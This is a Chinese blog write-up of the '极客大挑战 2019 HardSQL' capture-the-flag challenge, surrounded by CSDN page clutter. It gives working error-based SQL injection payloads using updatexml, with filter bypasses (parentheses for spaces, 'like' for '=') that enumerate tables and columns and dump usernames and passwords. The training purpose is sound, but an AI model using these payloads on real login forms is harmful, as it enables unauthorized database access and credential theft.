[极客大挑战 2019]HardSQL

最新推荐文章于 2024-05-26 08:45:50 发布
最新推荐文章于 2024-05-26 08:45:50 发布
阅读量18 收藏
点赞数
文章标签: 数据库 oracle sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45501486/article/details/133012938
版权

首先万能密码 admin'#,报出密码错误。

admin' union select 1,2,3#查询报出密另一种错误,开来是检测到恶意字符了。

先考虑union绕过,

单独拿出来试,大小写注释双写等都无法报出 wrong password 这个错误信息,说明没有绕过检测成功。

select通过以上方法也是无法绕。

好多检测过滤不掉了,联合查询此题看来是无法用了。

尝试报错注入。

admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#或者用异或代替or

admin'^(updatexml(1,concat(0x7e,database(),0x7e),1))#

得到数据库

admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database)),0x7e),1))#
用括号进行绕过空格。

updatexml concat select,information往后逐个检测是否有过滤,检查到等于号时

 发现等于号原来也被过滤了,可用like进行代替。

admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#

admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#

 admin'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))#

 只得到左边的flag,看来是对数据库的数据显示有长度限制,只显示了左边的26个字符

网上的一个骚姿势是用right函数right(password,27)显示右边的26个字符

拼接得到flag。

带点仙气的酷男子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
2019年三诺集团四周年庆典极客摇滚跑活动方案
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
python极客项目编程pdf
03-31
python极客项目编程书籍,很好的一本深入学习python的书籍
【MySQL精通之路】SQL优化(1)-查询优化(1)-WHERE子句
Anakki的博客
05-22 520
与PRIMARY KEY或UNIQUE索引上的WHERE子句一起使用的表,其中所有索引部分都与常量表达式进行比较,并定义为NOT NULL。由于MySQL会自动进行类似的优化,因此您通常可以避免这项工作,并将查询保留为更易于理解和维护的形式。因为MySQL优化器的开发工作还在进行中,所以这里并没有记录MySQL优化器所有的优化。您可能会试图重写查询以加快算术运算,同时牺牲可读性。,这有助于简化join连接。有关更多信息和示例,请参见“有关更多信息,请参见“空表或只有一行的表。
hackmyvm】Slowman靶机
woshicainiao666的博客
05-20 1647
发现/secretLOGIN/login.html为登录地址,根据账号密码登录发现一个zip,但是需要密码。在FTP中得到的账号,爆破一下SSH。上传linpeas.sh文件,报一下。SSH爆破无果,试试mysql。得到用户名和加密的密码。
Linux文件操作——实现cp指令以及模拟修改配置文件
shion1114的博客
05-23 332
cp 1.c 2.c功能是将(内容相同,实现拷贝)main函数的参数由编译结果可知,总共有三个输入参数,同时输出每个参数字符串内容。
《Python编程从入门到实践》day36
m0_37565294的博客
05-22 1399
我们要编写一个名为“学习笔记”的Web应用程序,让用户能够记录感兴趣的主题,并在学习每个主题的过程中添加日志条目。django-admin startproject learning_log . # 新建一个名为learning_log的项目,末尾的句点让新项目使用合适的目录结构。运行命令ls,其输出表明Django有创建一个db.sqlite3.SQLite使用一种使用单个文件的数据库。# 包含4个文件(settings.py、urls.py、wsgi.py、__init__.py)
Redis 完整
m0_73173239的博客
05-24 820
什么是 redis?是一种基于键值对的 NoSql数据库。与 hashMap 不同的是,Redis 中的 value 支持 string(字符串)、hash(哈希)、 list(列表)、set(集合)、zset(有序集合)、Bitmaps(位图)、GEO(地理信息定位)等多种数据结构。而 HashMap 只是 redis 中的 hash ,他们俩结构是相同的。
微信小程序uniapp+django洗脚按摩足浴城消费系统springboot
QQ1304979694的博客
05-24 554
Python语言官方规范访问数据库的统一接口规范(Python DB-API),防止在使用不同数据库时,由于底层数据库技术不同造成接口程序紊乱的问题。(3)项目初期开发,美工设计,前端实现,开发信息系统的用户功能的实现,完善界面排版,实现信息提取发送等一系列功能。项目系统最后阶段的修改及最终测试运行。当然,在研究过程中也可以直接调查,对调查搜集到的资料进行综合分析、比较,调查法是科学研究中普遍的研究方法。(5)系统测试:对设计好的程序进行最终调试,通过调试发现存在的问题并解决,从而达到完善系统的目的。
租赁系统|北京租赁系统|租赁软件开发流程
hegaokj的博客
05-25 454
此外,还需要考虑数据库的选择,如MySQL、MongoDB等,以满足数据存储和查询的需求。综上所述,租赁小程序的开发流程涉及需求分析、技术选型、设计与开发、测试与优化、上线与推广以及后期维护与更新等多个环节。只有这样,才能打造出功能完善、性能稳定、用户体验良好的租赁小程序,为商家带来更多的商业机会和收益。商家需要明确小程序的功能需求,包括用户注册登录、商品浏览、在线预约、支付结算、订单管理、评价反馈等。同时,也要关注行业动态和技术发展,及时将新技术和理念应用到小程序中,以保持小程序的竞争力和生命力。
005、API_数据结构
最新发布
细致-专业-实操
05-26 187
Redis这样设计有两个好处:第一,可以改进内部编码,而对外的数据 结构和命令没有影响,这样一旦开发出更优秀的内部编码,无需改动外部数 据结构和命令,例如Redis3.2提供了quicklist,结合了ziplist和linkedlist两者 69 的优势,为列表类型提供了一种更为优秀的内部编码实现,而对外部用户来 说基本感知不到。键的数据结构类型,它们分别是: string(字符串)、hash(哈希)、list(列表)、set(集合)、zset(有序集 合),这些只是Redis对外的数据结构,
Mysql注入详细讲解
2401_84466359的博客
05-24 613
*原理:**用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的时候不会进行处理,所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。GET/POST提交数据时,发现提交的数据被加密了(可能js加密),那么在提交数据前,抓包,解密,将注入语句写好,然后将整个语句进行加密(相同加密算法),再将数据发过去。HTTP 头注入常常发生在程序采集用户信息的模块中。
MyBatis从浅入深
Cobrander2_0的博客
05-21 674
Mybatis用于简化Java当中对于JDBC的操作,它将连接数据库,执行SQL命令自动化实现。
国产化信息技术基础设施构建方案
雨笋情缘的专栏
05-20 265
随着信息技术国产化的趋势日益增强,为保障信息安全与自主可控,本方案旨在通过全面调研与科学评估,实现操作系统及基础软件的国产替代。本方案将聚焦于国产操作系统的调研与选择,以及数据库、中间件等基础软件的国产化替代方案,确保技术体系的高效稳定运行与持续发展。本方案旨在通过系统性的调研与评估,实现信息技术基础设施的国产化升级,提升系统的安全性与自主可控能力。未来,随着国产软硬件生态的不断成熟,将进一步优化技术栈,促进技术创新与产业升级,为企业的可持续发展奠定坚实的基础。兼容性:对常用应用软件、硬件设备的支持情况。
数据挖掘导致直接路径读(direct path read)耗尽了IO
lmxx2020的博客
05-23 204
建议该模块放到容灾库去跑,业务停止DDTEK ODBC Oracle模块,操作IO负载降下来,在50%左右,后台等待事件消除,业务恢复正常。后台有两个并行rman备份在,停止备份io繁忙没有好转,检查最近ash报告,发现DDTEK ODBC Oracle程序模块占用最高。检查后台,发现直接路径读和DDTEK ODBC Oracle等待事件比较多。检查该模块,发现是通过odbc过来的挖掘程序。一大早就有喊业务卡的,检查等待事件源头,均为oracle写等待。查看IO负载持续维持在100%繁忙。
mysql 按区间统计 3 分钟维度
weixin_43153309的博客
05-20 250
时间按三分钟切块,后进行统计。
软考高级架构师:DSSA 垂直域、水平域
明明如月的技术博客
05-20 197
在特定领域软件架构(Domain-Specific Software Architecture, DSSA)中,不同的域(Vertical Domain, Horizontal Domain, Functional Domain, Quality Domain)有各自的角色和功能。
极客挑战 2019]EasySQL
09-03
EasySQL极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值